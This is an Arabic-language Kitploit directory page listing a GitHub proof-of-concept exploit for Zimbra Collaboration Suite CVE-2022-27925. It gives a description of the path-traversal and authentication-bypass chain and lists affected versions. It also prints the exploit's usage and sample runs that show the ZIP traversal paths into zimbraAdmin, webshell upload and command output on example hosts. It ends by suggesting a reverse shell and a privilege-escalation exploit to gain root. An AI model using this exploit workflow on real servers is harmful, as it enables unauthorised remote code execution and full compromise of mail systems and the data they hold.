Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/josexv1/cve-2022-27925
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubjosexv1/cve-2022-27925

CVE-2022-27925

إثبات المفهوم لثغرة Zimbra CVE-2022-27925

عرض المستودع
43191منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-27925

الوصف

في 10 مايو 2022، أصدرت Zimbra الإصدارين 9.0.0 patch 24 و8.8.15 patch 31 لمعالجة العديد من الثغرات الأمنية في Zimbra Collaboration Suite، بما في ذلك CVE-2022-27924 (التي كتبنا عنها سابقًا) وCVE-2022-27925.

في البداية، وصفت Zimbra الثغرة CVE-2022-27925 بأنها هجوم اجتياز مسار (path traversal) مصادق عليه، حيث يمكن لمستخدم إداري كتابة ملفات في أي دليل على نظام الملفات باستخدام حساب Zimbra. ولأنه كان يُعتقد في البداية أنه هجوم يخص المسؤولين فقط، منحته NVD درجة أساسية 7.8 وفق معيار CVSS. لاحقًا، لاحظت Volexity أن المهاجمين الذين يستغلون هذه الثغرة وجدوا طريقة لتجاوز متطلبات المسؤول، وكتبت عن ذلك في 10 أغسطس 2022. وقد حصل هذا التجاوز الجديد للمصادقة على معرف جديد – CVE-2022-37042.

من خلال الجمع بين ثغرة اجتياز المسار الأصلية وتجاوز المصادقة الجديد، يمكن للمهاجمين اختراق نظام Zimbra Collaboration Suite عن بُعد عبر منفذ المسؤول (7071 افتراضيًا) بشكل مجهول. وبالاقتران مع ثغرة تصعيد صلاحيات غير مصححة حاليًا والتي كتبنا عنها مؤخرًا وكتبنا لها استغلالًا، تؤدي هذه الثغرات الثلاث إلى تنفيذ أوامر عن بُعد بصلاحيات المستخدم الجذر (root) على الأنظمة غير المصححة.

على الرغم من أن النشرات العامة لا تذكر ذلك، إلا أنه وفقًا لتحليلنا، فإن Zimbra Collaboration Suite Network Edition (النسخة المدفوعة) معرّضة للخطر، بينما Open Source Edition (المجانية) ليست كذلك (لأنها لا تحتوي على نقطة النهاية mboximport المعرّضة للخطر). الإصدارات المعرّضة للخطر هي:

root@kitploit:~
Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)

هذه الثغرات (وأخرى في Zimbra) تُستهدف لاستغلالها على نطاق واسع في البرية، ولذلك يجب تصحيحها أو إخراجها من الخدمة في أقرب وقت ممكن. إذا كنت تشك في اختراق نظامك، توفر Zimbra خطوات لإعادة بناء خادم Zimbra Collaboration Suite من الصفر على أحدث تصحيح دون فقدان البيانات.

المصدر: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis

الاستخدام

root@kitploit:~
 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

usage: exploit.py [-h] [-t TARGET] [-l LIST]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URl with protocol HTTPS
  -l LIST, --list LIST  List of targets

مثال للتشغيل

root@kitploit:~
root@root# python exploit.py -t zimbra.example.com
_____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux

root@root# python exploit.py -l targets.txt

 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable

root@root# .

احصل على صلاحيات الجذر!

للحصول على صلاحيات الجذر، يمكنك استدعاء قشرة عكسية (reverse shell)، ثم استخدام Slaper's LPE

تنزيل الأداة